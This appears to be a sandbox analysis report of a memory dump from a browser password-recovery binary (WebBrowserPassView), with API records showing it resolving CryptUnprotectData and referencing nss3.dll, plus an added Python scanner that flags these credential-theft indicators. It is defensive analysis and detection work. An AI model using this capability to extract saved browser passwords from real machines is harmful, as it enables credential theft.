  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
  • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
  • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
  • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
  • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
  • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
  • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
  • Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
  • Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 1392923015-3614832568

APIs
• memset.MSVCRT ref: 00415E2B
• GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
• free.MSVCRT(00000000), ref: 00415E7F
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0

APIs
• AreFileApisANSI.KERNEL32 ref: 00414D2B
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
• malloc.MSVCRT ref: 00414D53
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
• free.MSVCRT(?), ref: 00414D73
• free.MSVCRT(?,?), ref: 00414D91
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0

APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
• GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
• free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710

APIs
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
• memset.MSVCRT ref: 0040C129
  • Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D
  • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
  • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
• _snwprintf.MSVCRT ref: 0040C173
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
• String ID: <%s>%s</%s>$</item>$<item>
• API String ID: 2236007434-2769808009

APIs
• memset.MSVCRT ref: 0040D86C
  • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
• wcsrchr.MSVCRT ref: 0040D886
• wcscat.MSVCRT ref: 0040D8A2
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: .cfg$General
• API String ID: 776488737-1188829934

APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
• RegisterClassW.USER32 ref: 0040E076
• GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
• CreateWindowExW.USER32 ref: 0040E09C
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID: WebBrowserPassView
• API String ID: 2678498856-2171583229

APIs
• memset.MSVCRT ref: 0040C2EB
• memset.MSVCRT ref: 0040C302
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
  • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
  • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
• _snwprintf.MSVCRT ref: 0040C33E
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
• String ID: <%s>$<?xml version="1.0" ?>
• API String ID: 168708657-3296998653

                                                  • Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                  • Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
                                                  • Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                  • Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                  • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: CryptUnprotectData$crypt32.dll
                                                  • API String ID: 145871493-1827663648
                                                  • Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                  • Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
                                                  • Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                  • Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcscpy.MSVCRT ref: 00411DC1
                                                  • wcscpy.MSVCRT ref: 00411DDC
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  • API String ID: 999786162-26480598
                                                  • Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                  • Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
                                                  • Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                  • Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                  • _snwprintf.MSVCRT ref: 004071FE
                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  • API String ID: 313946961-1552265934
                                                  • Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                  • Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
                                                  • Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                  • Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,004048E6,00000000), ref: 0041245E
                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                  • FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  • API String ID: 145871493-1506664499
                                                  • Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                  • Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
                                                  • Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                  • Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  • API String ID: 0-1953309616
                                                  • Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                  • Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
                                                  • Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                  • Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
                                                  • unknown column "%s" in foreign key definition, xrefs: 0042EFB9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  • API String ID: 3510742995-272990098
                                                  • Opcode ID: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                  • Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
                                                  • Opcode Fuzzy Hash: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                  • Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcslen$wcscatwcscpy
                                                  • String ID: nss3.dll
                                                  • API String ID: 1250441359-2492180550
                                                  • Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                  • Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
                                                  • Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                  • Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
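
The records above show the dumped module at 0x00400000 (process 3) loading crypt32.dll and resolving CryptUnprotectData at runtime (ref 00403862), referencing nss3.dll through wcscpy/wcscat, and carrying SQLite's foreign-key error strings; taken together that is the DPAPI-plus-NSS browser credential recovery path. As an added example, not code from the Joe Sandbox report or from the analysed sample, the script below turns those String IDs into a triage scan over a memory dump. The point it encodes is an assumption worth stating: strings handed to LoadLibraryW and the wcs* helpers are UTF-16LE while a GetProcAddress export name is narrow, so an ASCII-only string scan misses the DLL names. The dump bytes are constructed, the group names are the example's own, and a hit is a capability indicator rather than a verdict, since the report itself attributes this code to the WebBrowserPassView recovery tool, which also ships in a legitimate form.

```python
"""Triage scan for the credential-recovery indicators recorded in this report.

Added example, not code from the sandbox report or from the analysed sample.
It looks for the same strings the function records above load, resolve or
reference, in the encoding each API actually consumes, and reports which
indicator groups co-occur in a memory dump.
"""
from __future__ import annotations

from dataclasses import dataclass

WIDE = "utf-16-le"   # LoadLibraryW, wcscpy/wcscat operate on UTF-16LE strings
NARROW = "ascii"     # GetProcAddress only accepts a narrow export name

# Indicator groups built from the String IDs in the records above.
# Group names are this example's own labels, not report terminology.
INDICATORS: dict[str, list[str]] = {
    "dpapi_resolver": ["crypt32.dll", "CryptUnprotectData"],
    "firefox_nss": ["nss3.dll"],
    "embedded_sqlite": [
        "foreign key constraint failed",
        'unknown column "%s" in foreign key definition',
    ],
    "profile_lookup": ["shell32.dll", "SHGetSpecialFolderPathW"],
    "nirsoft_tool": ["WebBrowserPassView"],
}


@dataclass(frozen=True)
class Hit:
    group: str
    text: str
    encoding: str
    offset: int


def find_string(blob: bytes, text: str, encoding: str) -> list[int]:
    """Offsets of every occurrence of `text` in `blob`, encoded as `encoding`."""
    needle = text.encode(encoding)
    offsets: list[int] = []
    pos = blob.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(needle, pos + 1)
    return offsets


def scan(blob: bytes) -> list[Hit]:
    """Search every indicator in both encodings and record which one matched."""
    hits: list[Hit] = []
    for group, strings in INDICATORS.items():
        for text in strings:
            for enc in (NARROW, WIDE):
                hits.extend(Hit(group, text, enc, off) for off in find_string(blob, text, enc))
    return hits


def groups_present(hits: list[Hit]) -> set[str]:
    """A group counts only when every string in it was found, in any encoding.
    crypt32.dll alone is ordinary; crypt32.dll together with CryptUnprotectData
    is the dynamic DPAPI resolver the record at 00403862 shows."""
    found: dict[str, set[str]] = {g: set() for g in INDICATORS}
    for h in hits:
        found[h.group].add(h.text)
    return {g for g, strings in INDICATORS.items() if found[g] == set(strings)}


def verdict(blob: bytes) -> tuple[set[str], str]:
    """Capability label, not a malware verdict: the NirSoft recovery tool the
    report names carries the same strings in its legitimate form."""
    present = groups_present(scan(blob))
    if "dpapi_resolver" in present and present & {"firefox_nss", "embedded_sqlite"}:
        return present, "browser-credential-recovery capability"
    if present:
        return present, "partial indicators"
    return present, "none"


def constructed_dump() -> bytes:
    """Constructed stand-in for a dumped region: filler plus the strings in
    the encodings the recorded APIs consume. Not bytes from the real sample."""
    return b"".join([
        b"\x00" * 64,
        "crypt32.dll".encode(WIDE) + b"\x00\x00",
        b"CryptUnprotectData\x00",
        b"\x90" * 32,
        "nss3.dll".encode(WIDE) + b"\x00\x00",
        b"foreign key constraint failed\x00",
        b'unknown column "%s" in foreign key definition\x00',
        "shell32.dll".encode(WIDE) + b"\x00\x00",
        b"SHGetSpecialFolderPathW\x00",
        "WebBrowserPassView".encode(WIDE) + b"\x00\x00",
    ])


if __name__ == "__main__":
    dump = constructed_dump()
    for hit in scan(dump):
        print(f"{hit.offset:#08x} {hit.group:16s} {hit.encoding:9s} {hit.text}")
    print(verdict(dump))
```

Run against a real dump, the offsets of the narrow export name next to the wide DLL name are the spot to pivot to in the disassembler; the LoadLibraryW/GetProcAddress/FreeLibrary triple recorded above is what should sit a few instructions away.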

                                                  APIs
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE62
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040AE75
                                                  • free.MSVCRT(00000000), ref: 0040AEAE
                                                    • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@$free
                                                  • String ID:
                                                  • API String ID: 2241099983-0
                                                  • Opcode ID: 0b66915f84970c8dee2b815cea6b5dfc4349602c711738901fa1bf88fce7501e
                                                  • Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
                                                  • Opcode Fuzzy Hash: 0b66915f84970c8dee2b815cea6b5dfc4349602c711738901fa1bf88fce7501e
                                                  • Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00414CC6
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
                                                  • malloc.MSVCRT ref: 00414CEC
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
                                                  • free.MSVCRT(?), ref: 00414D13
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                  • String ID:
                                                  • API String ID: 4053608372-0
                                                  • Opcode ID: 7aaa167120dddf07ba2af9e079abf54c4ac6044bb501c5d34657e102407f57a5
                                                  • Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
                                                  • Opcode Fuzzy Hash: 7aaa167120dddf07ba2af9e079abf54c4ac6044bb501c5d34657e102407f57a5
                                                  • Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040A314
                                                  • GetWindowRect.USER32 ref: 0040A321
                                                  • GetClientRect.USER32 ref: 0040A32C
                                                  • MapWindowPoints.USER32 ref: 0040A33C
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                  • Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
                                                  • Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                  • Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00442216
                                                  • memset.MSVCRT ref: 00442225
                                                    • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00442248
                                                    • Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
                                                    • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5
                                                  • CloseHandle.KERNEL32(00000000), ref: 0044224F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  • API String ID: 1471605966-0
                                                  • Opcode ID: 3fb3a795f412c9ef8ba02b3b663898961b1c6dbae64b6d36bd5d494f69bd21b5
                                                  • Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
                                                  • Opcode Fuzzy Hash: 3fb3a795f412c9ef8ba02b3b663898961b1c6dbae64b6d36bd5d494f69bd21b5
                                                  • Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: bb5b54d35ac9345d4f67fd1f43b9bd0339cc6982e71662365849d1d3c181b2be
                                                  • Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
                                                  • Opcode Fuzzy Hash: bb5b54d35ac9345d4f67fd1f43b9bd0339cc6982e71662365849d1d3c181b2be
                                                  • Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C37F
                                                  • memset.MSVCRT ref: 0040C396
                                                    • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                    • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                  • _snwprintf.MSVCRT ref: 0040C3C5
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                  • String ID: </%s>
                                                  • API String ID: 168708657-259020660
                                                  • Opcode ID: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                  • Instruction ID: 40532074a48dce177473b235f1db1661615fe75cb863f0afecc7fe9ed9b88556
                                                  • Opcode Fuzzy Hash: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                  • Instruction Fuzzy Hash: 910136F3D4012976EB20A755DC45FEE76BCEF45308F4000B6BB09B7181DB78AA458AA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  • API String ID: 1523050162-4135340389
                                                  • Opcode ID: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                  • Instruction ID: f5bb4e3483ddd063dbb45333af41605001ac6cd66b5ccbc099165aa82e617e5a
                                                  • Opcode Fuzzy Hash: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                  • Instruction Fuzzy Hash: 44F0C83690031466FB20EB51DD4EB9A3768AB04755F5000B6FF04B61D2DBF89E50CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
                                                    • Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7
                                                  • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                  • SendDlgItemMessageW.USER32 ref: 0040107C
                                                  • SendDlgItemMessageW.USER32 ref: 0040109A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 210187428-168460110
                                                  • Opcode ID: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                  • Instruction ID: b86dbe1d582a7894089203107e7a1e4413fc3d6f7e8de8594febed0b37e93160
                                                  • Opcode Fuzzy Hash: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                  • Instruction Fuzzy Hash: 56F05E75A4030877E621ABA0DC06F8A7BB9B740B01F000935B711B51E0D7E4A285C658
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  • API String ID: 2747424523-2167791130
                                                  • Opcode ID: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                  • Instruction ID: 51a03c7d5923a90201923a44b10f324a390683a0d3b2f84b2934c4bf373e0ab9
                                                  • Opcode Fuzzy Hash: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                  • Instruction Fuzzy Hash: A9E04872D8031E7AFB14ABA0DC4BFA977BCBB04704F5001F5B615E10D2EBB4A6454A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2574300362-880857682
                                                  • Opcode ID: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                  • Instruction ID: 4b50289c71ca44835333f785f02b611be4b8370b72da6f54bb0e40a9521e89f3
                                                  • Opcode Fuzzy Hash: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                  • Instruction Fuzzy Hash: 86D0C774600313BADB108F209D48B4239746712743F251036F430D1771DF7895C49A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memcmp
